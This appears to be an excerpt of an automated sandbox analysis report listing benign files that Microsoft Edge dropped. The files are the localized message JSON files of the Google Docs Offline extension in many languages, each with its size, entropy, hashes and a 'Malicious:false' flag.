                                                                                                                                                      Preview:{.. "createnew": {.. "message": "CREA'N UN DE NOU".. },.. "explanationofflinedisabled": {.. "message": "No tens connexi.. Per utilitzar Documents de Google sense connexi. a Internet, ves a la configuraci. de la p.gina d'inici d'aquest servei i activa l'opci. per sincronitzar-se sense connexi. la propera vegada que estiguis connectat a la xarxa.".. },.. "explanationofflineenabled": {.. "message": "Tot i que no tens connexi., pots editar o crear fitxers.".. },.. "extdesc": {.. "message": "Edita, crea i consulta documents, fulls de c.lcul i presentacions, tot sense acc.s a Internet.".. },.. "extname": {.. "message": "Documents de Google sense connexi.".. },.. "learnmore": {.. "message": "M.s informaci.".. },.. "popuphelptext": {.. "message": "Escriu text, edita fitxers i col.labora-hi siguis on siguis, amb o sense connexi. a Internet.".. }..}..
                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                      File Type:JSON data
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):913
                                                                                                                                                      Entropy (8bit):4.947221919047
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:12:1HASvgdsbCBxNBmobXP15Dxoo60n40h6qCBxeBeGG/9jZCSUKFPDLZ2B2hCBhPLm:1HApJmoZ5e50nzQhwAd7dvYB2kDSGGKs
                                                                                                                                                      MD5:CCB00C63E4814F7C46B06E4A142F2DE9
                                                                                                                                                      SHA1:860936B2A500CE09498B07A457E0CCA6B69C5C23
                                                                                                                                                      SHA-256:21AE66CE537095408D21670585AD12599B0F575FF2CB3EE34E3A48F8CC71CFAB
                                                                                                                                                      SHA-512:35839DAC6C985A6CA11C1BFF5B8B5E59DB501FCB91298E2C41CB0816B6101BF322445B249EAEA0CEF38F76D73A4E198F2B6E25EEA8D8A94EA6007D386D4F1055
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview:{.. "createnew": {.. "message": "VYTVO.IT".. },.. "explanationofflinedisabled": {.. "message": "Jste offline. Pokud chcete Dokumenty Google pou..vat bez p.ipojen. k.internetu, a. budete p...t. online, p.ejd.te do nastaven. na domovsk. str.nce Dokument. Google a.zapn.te offline synchronizaci.".. },.. "explanationofflineenabled": {.. "message": "Jste offline, ale st.le m..ete upravovat dostupn. soubory nebo vytv..et nov..".. },.. "extdesc": {.. "message": "Upravujte, vytv..ejte a.zobrazujte sv. dokumenty, tabulky a.prezentace . v.e bez p..stupu k.internetu.".. },.. "extname": {.. "message": "Dokumenty Google offline".. },.. "learnmore": {.. "message": "Dal.. informace".. },.. "popuphelptext": {.. "message": "Pi.te, upravujte a.spolupracujte kdekoli, s.p.ipojen.m k.internetu i.bez n.j.".. }..}..
                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                      File Type:JSON data
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):806
                                                                                                                                                      Entropy (8bit):4.815663786215102
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:12:YGo35xMxy6gLr4Dn1eBVa1xzxyn1VFQB6FDVgdAJex9QH7uy+XJEjENK32J21j:Y735+yoeeRG54uDmdXx9Q7u3r83Xj
                                                                                                                                                      MD5:A86407C6F20818972B80B9384ACFBBED
                                                                                                                                                      SHA1:D1531CD0701371E95D2A6BB5EDCB79B949D65E7C
                                                                                                                                                      SHA-256:A482663292A913B02A9CDE4635C7C92270BF3C8726FD274475DC2C490019A7C9
                                                                                                                                                      SHA-512:D9FBF675514A890E9656F83572208830C6D977E34D5744C298A012515BC7EB5A17726ADD0D9078501393BABD65387C4F4D3AC0CC0F7C60C72E09F336DCA88DE7
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview:{"createnew":{"message":"CREU NEWYDD"},"explanationofflinedisabled":{"message":"Rydych chi all-lein. I ddefnyddio Dogfennau Google heb gysylltiad \u00e2'r rhyngrwyd, ewch i'r gosodiadau ar dudalen hafan Dogfennau Google a throi 'offine sync' ymlaen y tro nesaf y byddwch wedi'ch cysylltu \u00e2'r rhyngrwyd."},"explanationofflineenabled":{"message":"Rydych chi all-lein, ond gallwch barhau i olygu'r ffeiliau sydd ar gael neu greu rhai newydd."},"extdesc":{"message":"Gallwch olygu, creu a gweld eich dogfennau, taenlenni a chyflwyniadau \u2013 i gyd heb fynediad i'r rhyngrwyd."},"extname":{"message":"Dogfennau Google All-lein"},"learnmore":{"message":"DYSGU MWY"},"popuphelptext":{"message":"Ysgrifennwch, golygwch a chydweithiwch lle bynnag yr ydych, gyda chysylltiad \u00e2'r rhyngrwyd neu hebddo."}}.
                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                      File Type:JSON data
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):883
                                                                                                                                                      Entropy (8bit):4.5096240460083905
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:24:1HA4EFkQdUULMnf1yo+9qgpukAXW9bGJTvDyqdr:zEFkegfw9qwAXWNs/yu
                                                                                                                                                      MD5:B922F7FD0E8CCAC31B411FC26542C5BA
                                                                                                                                                      SHA1:2D25E153983E311E44A3A348B7D97AF9AAD21A30
                                                                                                                                                      SHA-256:48847D57C75AF51A44CBF8F7EF1A4496C2007E58ED56D340724FDA1604FF9195
                                                                                                                                                      SHA-512:AD0954DEEB17AF04858DD5EC3D3B3DA12DFF7A666AF4061DEB6FD492992D95DB3BAF751AB6A59BEC7AB22117103A93496E07632C2FC724623BB3ACF2CA6093F3
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview:{.. "createnew": {.. "message": "OPRET NYT".. },.. "explanationofflinedisabled": {.. "message": "Du er offline. Hvis du vil bruge Google Docs uden en internetforbindelse, kan du g. til indstillinger p. startsiden for Google Docs og aktivere offlinesynkronisering, n.ste gang du har internetforbindelse.".. },.. "explanationofflineenabled": {.. "message": "Du er offline, men du kan stadig redigere tilg.ngelige filer eller oprette nye.".. },.. "extdesc": {.. "message": "Rediger, opret og se dine dokumenter, regneark og pr.sentationer helt uden internetadgang.".. },.. "extname": {.. "message": "Google Docs Offline".. },.. "learnmore": {.. "message": "F. flere oplysninger".. },.. "popuphelptext": {.. "message": "Skriv, rediger og samarbejd, uanset hvor du er, og uanset om du har internetforbindelse.".. }..}..
                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                      File Type:JSON data
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):1031
                                                                                                                                                      Entropy (8bit):4.621865814402898
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:24:1HA6sZnqWd77ykJzCkhRhoe1HMNaAJPwG/p98HKpy2kX/R:WZqWxykJzthRhoQma+tpyHX2O/R
                                                                                                                                                      MD5:D116453277CC860D196887CEC6432FFE
                                                                                                                                                      SHA1:0AE00288FDE696795CC62FD36EABC507AB6F4EA4
                                                                                                                                                      SHA-256:36AC525FA6E28F18572D71D75293970E0E1EAD68F358C20DA4FDC643EEA2C1C5
                                                                                                                                                      SHA-512:C788C3202A27EC220E3232AE25E3C855F3FDB8F124848F46A3D89510C564641A2DFEA86D5014CEA20D3D2D3C1405C96DBEB7CCAD910D65C55A32FDCA8A33FDD4
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview:{.. "createnew": {.. "message": "NEU ERSTELLEN".. },.. "explanationofflinedisabled": {.. "message": "Sie sind offline. Um Google Docs ohne Internetverbindung zu verwenden, gehen Sie auf der Google Docs-Startseite auf \"Einstellungen\" und schalten die Offlinesynchronisierung ein, wenn Sie das n.chste Mal mit dem Internet verbunden sind.".. },.. "explanationofflineenabled": {.. "message": "Sie sind offline, aber k.nnen weiterhin verf.gbare Dateien bearbeiten oder neue Dateien erstellen.".. },.. "extdesc": {.. "message": "Mit der Erweiterung k.nnen Sie Dokumente, Tabellen und Pr.sentationen bearbeiten, erstellen und aufrufen.. ganz ohne Internetverbindung.".. },.. "extname": {.. "message": "Google Docs Offline".. },.. "learnmore": {.. "message": "Weitere Informationen".. },.. "popuphelptext": {.. "message": "Mit oder ohne Internetverbindung: Sie k.nnen von .berall Dokumente erstellen, .ndern und zusammen mit anderen
                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                      File Type:JSON data
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):1613
                                                                                                                                                      Entropy (8bit):4.618182455684241
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:24:1HAJKan4EITDZGoziRAc2Z8eEfkTJfLhGX7b0UBNoAcGpVyhxefSmuq:SKzTD0IK85JlwsGOUyaSk
                                                                                                                                                      MD5:9ABA4337C670C6349BA38FDDC27C2106
                                                                                                                                                      SHA1:1FC33BE9AB4AD99216629BC89FBB30E7AA42B812
                                                                                                                                                      SHA-256:37CA6AB271D6E7C9B00B846FDB969811C9CE7864A85B5714027050795EA24F00
                                                                                                                                                      SHA-512:8564F93AD8485C06034A89421CE74A4E719BBAC865E33A7ED0B87BAA80B7F7E54B240266F2EDB595DF4E6816144428DB8BE18A4252CBDCC1E37B9ECC9F9D7897
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview:{.. "createnew": {.. "message": ".......... ....".. },.. "explanationofflinedisabled": {.. "message": "..... ..... ......... ... .. ............... .. ....... Google ..... ....... ... ........., ......... .... ......... .... ...... ...... ... ........ Google ... ............. ... ........... ..... ........ ... ....... .... ... .. ..... ............ ... ..........".. },.. "explanationofflineenabled": {.. "message": "..... ..... ........ .... ........ .. .............. .. ......... ...... . .. ............. ... .......".. },.. "extdesc": {.. "message": ".............., ............ ... ..... .. ......., .
                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                      File Type:JSON data
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):851
                                                                                                                                                      Entropy (8bit):4.4858053753176526
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:12:1HASvgg4eCBxNdN3Pj1NzXW6iFryCBxesJGceKCSUuvNn3AwCBhUufz1tHaXRdAv:1HA3dj/BNzXviFrpj4sNQXJezAa6
                                                                                                                                                      MD5:07FFBE5F24CA348723FF8C6C488ABFB8
                                                                                                                                                      SHA1:6DC2851E39B2EE38F88CF5C35A90171DBEA5B690
                                                                                                                                                      SHA-256:6895648577286002F1DC9C3366F558484EB7020D52BBF64A296406E61D09599C
                                                                                                                                                      SHA-512:7ED2C8DB851A84F614D5DAF1D5FE633BD70301FD7FF8A6723430F05F642CEB3B1AD0A40DE65B224661C782FFCEC69D996EBE3E5BB6B2F478181E9A07D8CD41F6
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview:{.. "createnew": {.. "message": "CREATE NEW".. },.. "explanationofflinedisabled": {.. "message": "You're offline. To use Google Docs without an internet connection, go to settings on the Google Docs homepage and turn on offline sync the next time you're connected to the internet.".. },.. "explanationofflineenabled": {.. "message": "You're offline, but you can still edit available files or create new ones.".. },.. "extdesc": {.. "message": "Edit, create, and view your documents, spreadsheets, and presentations . all without internet access.".. },.. "extname": {.. "message": "Google Docs Offline".. },.. "learnmore": {.. "message": "Learn More".. },.. "popuphelptext": {.. "message": "Write, edit, and collaborate wherever you are, with or without an internet connection.".. }..}..
                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                      File Type:JSON data
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):851
                                                                                                                                                      Entropy (8bit):4.4858053753176526
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:12:1HASvgg4eCBxNdN3Pj1NzXW6iFryCBxesJGceKCSUuvNn3AwCBhUufz1tHaXRdAv:1HA3dj/BNzXviFrpj4sNQXJezAa6
                                                                                                                                                      MD5:07FFBE5F24CA348723FF8C6C488ABFB8
                                                                                                                                                      SHA1:6DC2851E39B2EE38F88CF5C35A90171DBEA5B690
                                                                                                                                                      SHA-256:6895648577286002F1DC9C3366F558484EB7020D52BBF64A296406E61D09599C
                                                                                                                                                      SHA-512:7ED2C8DB851A84F614D5DAF1D5FE633BD70301FD7FF8A6723430F05F642CEB3B1AD0A40DE65B224661C782FFCEC69D996EBE3E5BB6B2F478181E9A07D8CD41F6
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview:{.. "createnew": {.. "message": "CREATE NEW".. },.. "explanationofflinedisabled": {.. "message": "You're offline. To use Google Docs without an internet connection, go to settings on the Google Docs homepage and turn on offline sync the next time you're connected to the internet.".. },.. "explanationofflineenabled": {.. "message": "You're offline, but you can still edit available files or create new ones.".. },.. "extdesc": {.. "message": "Edit, create, and view your documents, spreadsheets, and presentations . all without internet access.".. },.. "extname": {.. "message": "Google Docs Offline".. },.. "learnmore": {.. "message": "Learn More".. },.. "popuphelptext": {.. "message": "Write, edit, and collaborate wherever you are, with or without an internet connection.".. }..}..
                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                      File Type:JSON data
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):848
                                                                                                                                                      Entropy (8bit):4.494568170878587
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:12:1HASvgg4eCBxNdN3vRyc1NzXW6iFrSCBxesJGceKCSUuvlvOgwCBhUufz1tnaXrQ:1HA3djfR3NzXviFrJj4sJXJ+bA6RM
                                                                                                                                                      MD5:3734D498FB377CF5E4E2508B8131C0FA
                                                                                                                                                      SHA1:AA23E39BFE526B5E3379DE04E00EACBA89C55ADE
                                                                                                                                                      SHA-256:AB5CDA04013DCE0195E80AF714FBF3A67675283768FFD062CF3CF16EDB49F5D4
                                                                                                                                                      SHA-512:56D9C792954214B0DE56558983F7EB7805AC330AF00E944E734340BE41C68E5DD03EDDB17A63BC2AB99BDD9BE1F2E2DA5BE8BA7C43D938A67151082A9041C7BA
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview:{.. "createnew": {.. "message": "CREATE NEW".. },.. "explanationofflinedisabled": {.. "message": "You're offline. To use Google Docs without an Internet connection, go to settings on the Google Docs homepage and turn on offline sync the next time you're connected to the Internet.".. },.. "explanationofflineenabled": {.. "message": "You're offline, but you can still edit available files or create new ones.".. },.. "extdesc": {.. "message": "Edit, create and view your documents, spreadsheets and presentations . all without Internet access.".. },.. "extname": {.. "message": "Google Docs Offline".. },.. "learnmore": {.. "message": "Learn more".. },.. "popuphelptext": {.. "message": "Write, edit and collaborate wherever you are, with or without an Internet connection.".. }..}..
                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                      File Type:JSON data
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):1425
                                                                                                                                                      Entropy (8bit):4.461560329690825
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:24:1HA6Krbbds5Kna/BNzXviFrpsCxKU4irpNQ0+qWK5yOJAaCB7MAa6:BKrbBs5Kna/BNzXvi3sCxKZirA0jWK5m
                                                                                                                                                      MD5:578215FBB8C12CB7E6CD73FBD16EC994
                                                                                                                                                      SHA1:9471D71FA6D82CE1863B74E24237AD4FD9477187
                                                                                                                                                      SHA-256:102B586B197EA7D6EDFEB874B97F95B05D229EA6A92780EA8544C4FF1E6BC5B1
                                                                                                                                                      SHA-512:E698B1A6A6ED6963182F7D25AC12C6DE06C45D14499DDC91E81BDB35474E7EC9071CFEBD869B7D129CB2CD127BC1442C75E408E21EB8E5E6906A607A3982B212
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview:{.. "createNew": {.. "description": "Text shown in the extension pop up for creating a new document",.. "message": "CREATE NEW".. },.. "explanationOfflineDisabled": {.. "description": "Text shown in the extension popup when the user is offline and offline is disabled.",.. "message": "You're offline. To use Google Docs without an internet connection, go to settings on the Google Docs homepage and turn on offline sync the next time you're connected to the internet.".. },.. "explanationOfflineEnabled": {.. "description": "Text shown in the extension popup when the user is offline and offline is enabled.",.. "message": "You're offline, but you can still edit available files or create new ones.".. },.. "extDesc": {.. "description": "Extension description",.. "message": "Edit, create, and view your documents, spreadsheets, and presentations . all without internet access.".. },.. "extName": {.. "description": "Extension name",..
                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                      File Type:JSON data
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):961
                                                                                                                                                      Entropy (8bit):4.537633413451255
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:12:1HASvggeCBxNFxcw2CVcfamedatqWCCBxeFxCF/m+rWAaFQbCSUuExqIQdO06stp:1HAqn0gcfa9dc/5mCpmIWck02USfWmk
                                                                                                                                                      MD5:F61916A206AC0E971CDCB63B29E580E3
                                                                                                                                                      SHA1:994B8C985DC1E161655D6E553146FB84D0030619
                                                                                                                                                      SHA-256:2008F4FAAB71AB8C76A5D8811AD40102C380B6B929CE0BCE9C378A7CADFC05EB
                                                                                                                                                      SHA-512:D9C63B2F99015355ACA04D74A27FD6B81170750C4B4BE7293390DC81EF4CD920EE9184B05C61DC8979B6C2783528949A4AE7180DBF460A2620DBB0D3FD7A05CF
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview:{.. "createnew": {.. "message": "CREAR".. },.. "explanationofflinedisabled": {.. "message": "No tienes conexi.n. Para usar Documentos de Google sin conexi.n a Internet, ve a Configuraci.n en la p.gina principal de Documentos de Google y activa la sincronizaci.n sin conexi.n la pr.xima vez que te conectes a Internet.".. },.. "explanationofflineenabled": {.. "message": "No tienes conexi.n. Aun as., puedes crear archivos o editar los que est.n disponibles.".. },.. "extdesc": {.. "message": "Edita, crea y consulta tus documentos, hojas de c.lculo y presentaciones; todo ello, sin acceso a Internet.".. },.. "extname": {.. "message": "Documentos de Google sin conexi.n".. },.. "learnmore": {.. "message": "M.s informaci.n".. },.. "popuphelptext": {.. "message": "Escribe o edita contenido y colabora con otras personas desde cualquier lugar, con o sin conexi.n a Internet.".. }..}..
                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                      File Type:JSON data
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):959
                                                                                                                                                      Entropy (8bit):4.570019855018913
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:24:1HARn05cfa9dcDmQOTtSprj0zaGUSjSGZ:+n0CfMcDmQOTQprj4qpC
                                                                                                                                                      MD5:535331F8FB98894877811B14994FEA9D
                                                                                                                                                      SHA1:42475E6AFB6A8AE41E2FC2B9949189EF9BBE09FB
                                                                                                                                                      SHA-256:90A560FF82605DB7EDA26C90331650FF9E42C0B596CEDB79B23598DEC1B4988F
                                                                                                                                                      SHA-512:2CE9C69E901AB5F766E6CFC1E592E1AF5A07AA78D154CCBB7898519A12E6B42A21C5052A86783ABE3E7A05043D4BD41B28960FEDDB30169FF7F7FE7208C8CFE9
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview:{.. "createnew": {.. "message": "CREAR NUEVO".. },.. "explanationofflinedisabled": {.. "message": "No tienes conexi.n. Para usar Documentos de Google sin conexi.n a Internet, ve a la configuraci.n de la p.gina principal de Documentos de Google y activa la sincronizaci.n sin conexi.n la pr.xima vez que est.s conectado a Internet.".. },.. "explanationofflineenabled": {.. "message": "No tienes conexi.n, pero a.n puedes modificar los archivos disponibles o crear otros nuevos.".. },.. "extdesc": {.. "message": "Edita, crea y consulta tus documentos, hojas de c.lculo y presentaciones aunque no tengas acceso a Internet".. },.. "extname": {.. "message": "Documentos de Google sin conexi.n".. },.. "learnmore": {.. "message": "M.s informaci.n".. },.. "popuphelptext": {.. "message": "Escribe, modifica y colabora dondequiera que est.s, con conexi.n a Internet o sin ella.".. }..}..
                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                      File Type:JSON data
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):968
                                                                                                                                                      Entropy (8bit):4.633956349931516
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:24:1HA5WG6t306+9sihHvMfdJLjUk4NJPNczGr:mWGY0cOUdJODPmzs
                                                                                                                                                      MD5:64204786E7A7C1ED9C241F1C59B81007
                                                                                                                                                      SHA1:586528E87CD670249A44FB9C54B1796E40CDB794
                                                                                                                                                      SHA-256:CC31B877238DA6C1D51D9A6155FDE565727A1956572F466C387B7E41C4923A29
                                                                                                                                                      SHA-512:44FCF93F3FB10A3DB68D74F9453995995AB2D16863EC89779DB451A4D90F19743B8F51095EEC3ECEF5BD0C5C60D1BF3DFB0D64DF288DCCFBE70C129AE350B2C6
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview:{.. "createnew": {.. "message": "LOO UUS".. },.. "explanationofflinedisabled": {.. "message": "Teil ei ole v.rgu.hendust. Teenuse Google.i dokumendid kasutamiseks ilma Interneti-.henduseta avage j.rgmine kord, kui olete Internetiga .hendatud, teenuse Google.i dokumendid avalehel seaded ja l.litage sisse v.rgu.henduseta s.nkroonimine.".. },.. "explanationofflineenabled": {.. "message": "Teil ei ole v.rgu.hendust, kuid saate endiselt saadaolevaid faile muuta v.i uusi luua.".. },.. "extdesc": {.. "message": "Saate luua, muuta ja vaadata oma dokumente, arvustustabeleid ning esitlusi ilma Interneti-.henduseta.".. },.. "extname": {.. "message": "V.rgu.henduseta Google.i dokumendid".. },.. "learnmore": {.. "message": "Lisateave".. },.. "popuphelptext": {.. "message": "Kirjutage, muutke ja tehke koost..d .ksk.ik kus olenemata sellest, kas teil on Interneti-.hendus.".. }..}..
                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                      File Type:JSON data
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):838
                                                                                                                                                      Entropy (8bit):4.4975520913636595
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:24:YnmjggqTWngosqYQqE1kjO39m7OddC0vjWQMmWgqwgQ8KLcxOb:Ynmsgqyngosq9qxTOs0vjWQMbgqchb
                                                                                                                                                      MD5:29A1DA4ACB4C9D04F080BB101E204E93
                                                                                                                                                      SHA1:2D0E4587DDD4BAC1C90E79A88AF3BD2C140B53B1
                                                                                                                                                      SHA-256:A41670D52423BA69C7A65E7E153E7B9994E8DD0370C584BDA0714BD61C49C578
                                                                                                                                                      SHA-512:B7B7A5A0AA8F6724B0FA15D65F25286D9C66873F03080CBABA037BDEEA6AADC678AC4F083BC52C2DB01BEB1B41A755ED67BBDDB9C0FE4E35A004537A3F7FC458
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview:{"createnew":{"message":"SORTU"},"explanationofflinedisabled":{"message":"Ez zaude konektatuta Internetera. Google Dokumentuak konexiorik gabe erabiltzeko, joan Google Dokumentuak zerbitzuaren orri nagusiko ezarpenetara eta aktibatu konexiorik gabeko sinkronizazioa Internetera konektatzen zaren hurrengoan."},"explanationofflineenabled":{"message":"Ez zaude konektatuta Internetera, baina erabilgarri dauden fitxategiak edita ditzakezu, baita beste batzuk sortu ere."},"extdesc":{"message":"Editatu, sortu eta ikusi dokumentuak, kalkulu-orriak eta aurkezpenak Interneteko konexiorik gabe."},"extname":{"message":"Google Dokumentuak konexiorik gabe"},"learnmore":{"message":"Lortu informazio gehiago"},"popuphelptext":{"message":"Edonon zaudela ere, ez duzu zertan konektatuta egon idatzi, editatu eta lankidetzan jardun ahal izateko."}}.
                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                      File Type:JSON data
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):1305
                                                                                                                                                      Entropy (8bit):4.673517697192589
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:24:1HAX9yM7oiI99Rwx4xyQakJbfAEJhmq/RlBu92P7FbNcgYVJ0:JM7ovex4xyQaKjAEyq/p7taX0
                                                                                                                                                      MD5:097F3BA8DE41A0AAF436C783DCFE7EF3
                                                                                                                                                      SHA1:986B8CABD794E08C7AD41F0F35C93E4824AC84DF
                                                                                                                                                      SHA-256:7C4C09D19AC4DA30CC0F7F521825F44C4DFBC19482A127FBFB2B74B3468F48F1
                                                                                                                                                      SHA-512:8114EA7422E3B20AE3F08A3A64A6FFE1517A7579A3243919B8F789EB52C68D6F5A591F7B4D16CEE4BD337FF4DAF4057D81695732E5F7D9E761D04F859359FADB
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview:{.. "createnew": {.. "message": "..... ... ....".. },.. "explanationofflinedisabled": {.. "message": "...... ...... .... ....... .. ....... Google .... ..... ........ .... ... .. .. ....... ... ..... .. ....... .. .... .... ....... Google ..... . .......... ...... .. .... .....".. },.. "explanationofflineenabled": {.. "message": "...... ..... ... ...... ......... ......... .. .. .. ..... ..... ...... .... .. ........ ..... ..... .....".. },.. "extdesc": {.. "message": "...... ............ . ........ .. ....... ..... . ...... .... . ... ... ..... .... ...... .. ........".. },.. "extname": {.. "message": "....... Google .
                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                      File Type:JSON data
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):911
                                                                                                                                                      Entropy (8bit):4.6294343834070935
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:12:1HASvguCBxNMME2BESA7gPQk36xCBxeMMcXYBt+CSU1pfazCBhUunV1tLaX5GI2N:1HAVioESAsPf36O3Xst/p3J8JeEY
                                                                                                                                                      MD5:B38CBD6C2C5BFAA6EE252D573A0B12A1
                                                                                                                                                      SHA1:2E490D5A4942D2455C3E751F96BD9960F93C4B60
                                                                                                                                                      SHA-256:2D752A5DBE80E34EA9A18C958B4C754F3BC10D63279484E4DF5880B8FD1894D2
                                                                                                                                                      SHA-512:6E65207F4D8212736059CC802C6A7104E71A9CC0935E07BD13D17EC46EA26D10BC87AD923CD84D78781E4F93231A11CB9ED8D3558877B6B0D52C07CB005F1C0C
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview:{.. "createnew": {.. "message": "LUO UUSI".. },.. "explanationofflinedisabled": {.. "message": "Olet offline-tilassa. Jos haluat k.ytt.. Google Docsia ilman internetyhteytt., siirry Google Docsin etusivulle ja ota asetuksissa k.ytt..n offline-synkronointi, kun seuraavan kerran olet yhteydess. internetiin.".. },.. "explanationofflineenabled": {.. "message": "Olet offline-tilassa. Voit kuitenkin muokata k.ytett.viss. olevia tiedostoja tai luoda uusia.".. },.. "extdesc": {.. "message": "Muokkaa, luo ja katso dokumentteja, laskentataulukoita ja esityksi. ilman internetyhteytt..".. },.. "extname": {.. "message": "Google Docsin offline-tila".. },.. "learnmore": {.. "message": "Lis.tietoja".. },.. "popuphelptext": {.. "message": "Kirjoita, muokkaa ja tee yhteisty.t. paikasta riippumatta, my.s ilman internetyhteytt..".. }..}..
                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                      File Type:JSON data
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):939
                                                                                                                                                      Entropy (8bit):4.451724169062555
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:24:1HAXbH2eZXn6sjLITdRSJpGL/gWFJ3sqixO:ubHfZqsHIT/FLL3qO
                                                                                                                                                      MD5:FCEA43D62605860FFF41BE26BAD80169
                                                                                                                                                      SHA1:F25C2CE893D65666CC46EA267E3D1AA080A25F5B
                                                                                                                                                      SHA-256:F51EEB7AAF5F2103C1043D520E5A4DE0FA75E4DC375E23A2C2C4AFD4D9293A72
                                                                                                                                                      SHA-512:F66F113A26E5BCF54B9AAFA69DAE3C02C9C59BD5B9A05F829C92AF208C06DC8CCC7A1875CBB7B7CE425899E4BA27BFE8CE2CDAF43A00A1B9F95149E855989EE0
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview:{.. "createnew": {.. "message": "GUMAWA NG BAGO".. },.. "explanationofflinedisabled": {.. "message": "Naka-offline ka. Upang magamit ang Google Docs nang walang koneksyon sa internet, pumunta sa mga setting sa homepage ng Google Docs at i-on ang offline na pag-sync sa susunod na nakakonekta ka sa internet.".. },.. "explanationofflineenabled": {.. "message": "Naka-offline ka, ngunit maaari mo pa ring i-edit ang mga available na file o gumawa ng mga bago.".. },.. "extdesc": {.. "message": "I-edit, gawin, at tingnan ang iyong mga dokumento, spreadsheet, at presentation . lahat ng ito nang walang access sa internet.".. },.. "extname": {.. "message": "Google Docs Offline".. },.. "learnmore": {.. "message": "Matuto Pa".. },.. "popuphelptext": {.. "message": "Magsulat, mag-edit at makipag-collaborate nasaan ka man, nang mayroon o walang koneksyon sa internet.".. }..}..
                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                      File Type:JSON data
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):977
                                                                                                                                                      Entropy (8bit):4.622066056638277
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:24:1HAdy42ArMdsH50Jd6Z1PCBolXAJ+GgNHp0X16M1J1:EyfArMS2Jd6Z1PCBolX2+vNmX16Y1
                                                                                                                                                      MD5:A58C0EEBD5DC6BB5D91DAF923BD3A2AA
                                                                                                                                                      SHA1:F169870EEED333363950D0BCD5A46D712231E2AE
                                                                                                                                                      SHA-256:0518287950A8B010FFC8D52554EB82E5D93B6C3571823B7CECA898906C11ABCC
                                                                                                                                                      SHA-512:B04AFD61DE490BC838354E8DC6C22BE5C7AC6E55386FFF78489031ACBE2DBF1EAA2652366F7A1E62CE87CFCCB75576DA3B2645FEA1645B0ECEB38B1FA3A409E8
